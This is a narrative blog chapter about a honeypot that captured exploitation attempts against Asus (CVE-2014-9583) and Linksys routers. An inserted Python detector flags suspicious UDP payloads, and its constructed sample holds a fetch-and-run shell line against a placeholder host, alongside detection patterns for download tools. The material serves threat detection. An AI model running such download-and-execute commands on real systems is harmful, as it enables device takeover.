Chapter One: The Packet

This all started because I was bored and looking for something to do. Really.

One weekend in June I set up a honeypot: simply an Ubuntu Linux system running Apache, with full packet capture via tcpdump. I was expecting to capture Shellshock exploitation against the web server. So one of the first things I did was to look for the string wget, which would indicate that a hacker was attempting to break into a computer (my decoy honeypot) and was instructing it to download a larger, more complex program. I found wget all right, but not in the place I expected.

Packet to UDP port 9999

This network packet started everything. It was a packet to UDP port 9999 with an embedded shell script, instructing the computer to use wget to download a file and run it. One computer on the Internet has no business telling another what to do with an unsolicited command sent out of nowhere, and there was no authentication of any kind. So right away, I knew I had something “bad”. But what?

It was clear, from the presence of chmod, rm and other clues, that the target of the command was a Unix system. I soon discovered that some Asus routers, like the routers used in homes and small offices, listen on UDP port 9999. These routers often run a version of the Linux operating system. And there was a vulnerability and an exploit, documented by Friedrich Postelstorfer and Joshua “jduck” Drake. The vulnerability had the industry identifier CVE-2014-9583 and could let an unauthorized person take over an unpatched Asus router.
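The search described above, looking for download-and-run commands inside datagrams aimed at UDP port 9999, can be automated. The following is an added example, not code from the original post: it parses a raw IPv4/UDP packet and flags the combination of a suspect destination port and shell download or execute commands in the payload. The packet, addresses and host name are constructed placeholders, and the download-tool list is widened beyond the post's wget to curl and tftp.

```python
import re
import struct

# Constructed sample payload of the kind the post describes (download, make
# executable, run, clean up). The host name is a placeholder, not a real IoC.
SAMPLE_PAYLOAD = (b"cd /tmp; wget http://placeholder.invalid/bot.sh; "
                  b"chmod +x bot.sh; ./bot.sh; rm -f bot.sh")

def build_udp_packet(src_ip, dst_ip, sport, dport, payload):
    """Assemble a minimal IPv4 header + UDP header + payload (checksums zeroed)."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    return ip + udp

SUSPECT_PORTS = {9999}                                # Asus infosvr, per the post
DOWNLOAD_CMDS = re.compile(rb"\b(wget|curl|tftp)\b")  # wget from the post; others assumed
RUN_CMDS = re.compile(rb"\b(chmod|rm|sh)\b")          # execute / cleanup clues from the post

def inspect_packet(raw):
    """Return a finding dict for one raw IPv4 packet, or None if nothing matches."""
    if len(raw) < 20 or raw[0] >> 4 != 4:
        return None
    ihl = (raw[0] & 0x0F) * 4
    if raw[9] != 17 or len(raw) < ihl + 8:             # only UDP is inspected here
        return None
    sport, dport, ulen, _ = struct.unpack("!HHHH", raw[ihl:ihl + 8])
    if dport not in SUSPECT_PORTS:
        return None
    payload = raw[ihl + 8:ihl + ulen]
    reasons = []
    if DOWNLOAD_CMDS.search(payload):
        reasons.append("download command")
    if RUN_CMDS.search(payload):
        reasons.append("execute/cleanup command")
    if not reasons:
        return None
    return {"src": ".".join(map(str, raw[12:16])), "dst": ".".join(map(str, raw[16:20])),
            "dport": dport, "reasons": reasons, "payload": payload.decode(errors="replace")}

def scan(packets):
    """Run inspect_packet over a capture-like list of raw packets; keep the hits."""
    return [f for f in (inspect_packet(p) for p in packets) if f is not None]

if __name__ == "__main__":
    hit = build_udp_packet("192.0.2.10", "192.0.2.20", 40000, 9999, SAMPLE_PAYLOAD)
    for finding in scan([hit]):
        print(finding["src"], "->", finding["dst"], finding["dport"], finding["reasons"])
```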

But there’s more. Minutes before the attempt to exploit an Asus vulnerability, the same IP address attempted to exploit a vulnerability in Cisco/Linksys routers.

Packet to TCP port 80

So, one IP address attempts to break into another system on the Internet, first using a backdoor into Linksys hardware, then a few minutes later using a backdoor into Asus hardware. Some searching did not find public discussion of this tactic.

At this point I was thrilled and was eager to chase this threat. The instruction in the Asus exploit directed the would-be victim to download another program and run it. I tried to download the program in the same way, but the downloads were never successful. As I continued to capture exploitation attempts from multiple IP addresses around the world, I knew I would have to get smarter.

To be continued in chapter 2…
